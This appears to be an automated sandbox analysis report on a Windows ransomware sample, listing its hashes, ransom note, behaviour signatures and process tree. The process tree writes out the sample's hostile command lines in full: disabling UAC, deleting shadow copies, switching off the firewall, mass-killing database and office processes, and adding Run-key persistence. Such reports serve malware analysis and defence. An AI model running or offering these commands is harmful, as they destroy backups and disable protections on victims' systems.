Analysis

  • max time kernel
    128s
  • max time network
    112s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    01/04/2021, 09:52

General

  • Target

    rcru_64.exe

  • Size

    1.0MB

  • MD5

    0d5d7377432ee449f30626c2371a0080

  • SHA1

    56a1d1203d62c131b70837d75af79aa19a3b0487

  • SHA256

    94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9

  • SHA512

    19980615dbcba8ca8151aa5b93bc614b79edd1d77abbe37293001ecf16991cc939afca1cf62cac90c05510174cb8b7521a3074fbc160b47fd53d374521e06f0a

Malware Config

Extracted

  • Path
    \??\c:\Read_Me!_.txt
  • Ransom Note
    Your Data Locked. To Get Decryption Instructions Email Us ,Don't Edit Files Or Folders ! ID : 8oBO6b Email Address :[email protected]

Signatures

  • UAC bypass (3 TTPs)
  • Deletes shadow copies (2 TTPs)

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Windows Firewall (1 TTP)
  • Drops startup file (2 IoCs)
  • Adds Run key to start application (2 TTPs, 4 IoCs)
  • Drops desktop.ini file(s) (2 IoCs)
  • Enumerates connected drives (3 TTPs, 24 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory (64 IoCs)
  • Interacts with shadow copies (2 TTPs, 1 IoC)

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill (40 IoCs)
  • Modifies registry key (1 TTP, 3 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\rcru_64.exe
    "C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"
    1⤵
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2224
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Modifies registry key
        PID:1624
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:3848
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3344
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        PID:1424
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        PID:4088
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
        3⤵
        PID:1528
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im notepad.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1800
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im msftesql.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3704
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlagent.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3944
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlbrowser.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3860
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlservr.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3524
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqlwriter.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3712
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im oracle.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3676
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocssd.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:744
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im dbsnmp.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1376
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im synctime.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2452
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im agntsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3672
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mydesktopqos.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2128
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im isqlplussvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1768
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im xfssvccon.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:588
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mydesktopservice.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2164
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocautoupds.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:584
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im agntsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:756
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im encsvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3160
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im firefoxconfig.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3308
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im tbirdconfig.exe
        3⤵
        • Kills process with taskkill
        PID:752
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im ocomm.exe
        3⤵
        • Kills process with taskkill
        PID:748
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld.exe
        3⤵
        • Kills process with taskkill
        PID:3948
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld-nt.exe
        3⤵
        • Kills process with taskkill
        PID:2100
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mysqld-opt.exe
        3⤵
        • Kills process with taskkill
        PID:3156
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im dbeng50.exe
        3⤵
        • Kills process with taskkill
        PID:3924
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im sqbcoreservice.exe
        3⤵
        • Kills process with taskkill
        PID:3868
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im excel.exe
        3⤵
        • Kills process with taskkill
        PID:3556
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im infopath.exe
        3⤵
        • Kills process with taskkill
        PID:504
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im msaccess.exe
        3⤵
        • Kills process with taskkill
        PID:3404
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mspub.exe
        3⤵
        • Kills process with taskkill
        PID:2736
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im onenote.exe
        3⤵
        • Kills process with taskkill
        PID:1028
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im outlook.exe
        3⤵
        • Kills process with taskkill
        PID:2420
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im powerpnt.exe
        3⤵
        • Kills process with taskkill
        PID:3928
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im steam.exe
        3⤵
        • Kills process with taskkill
        PID:3844
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thebat.exe
        3⤵
        • Kills process with taskkill
        PID:2564
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thebat64.exe
        3⤵
        • Kills process with taskkill
        PID:580
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im thunderbird.exe
        3⤵
        • Kills process with taskkill
        PID:3472
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im visio.exe
        3⤵
        • Kills process with taskkill
        PID:2192
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im winword.exe
        3⤵
        • Kills process with taskkill
        PID:2748
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im wordpad.exe
        3⤵
        • Kills process with taskkill
        PID:4028
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo %date%-%time%
      2⤵
      PID:3972
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ver
      2⤵
      PID:3732
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
      2⤵
      PID:1040
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup myip.opendns.com. resolver1.opendns.com
        3⤵
        PID:2720
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
      2⤵
      PID:2868
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
        3⤵
        PID:2732
      • C:\Windows\SysWOW64\reg.exe
        reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
        3⤵
        • Modifies registry key
        PID:812
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
      2⤵
      PID:2116
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1520
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
        3⤵
        • Adds Run key to start application
        PID:3032
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2572

Network

MITRE ATT&CK Enterprise v6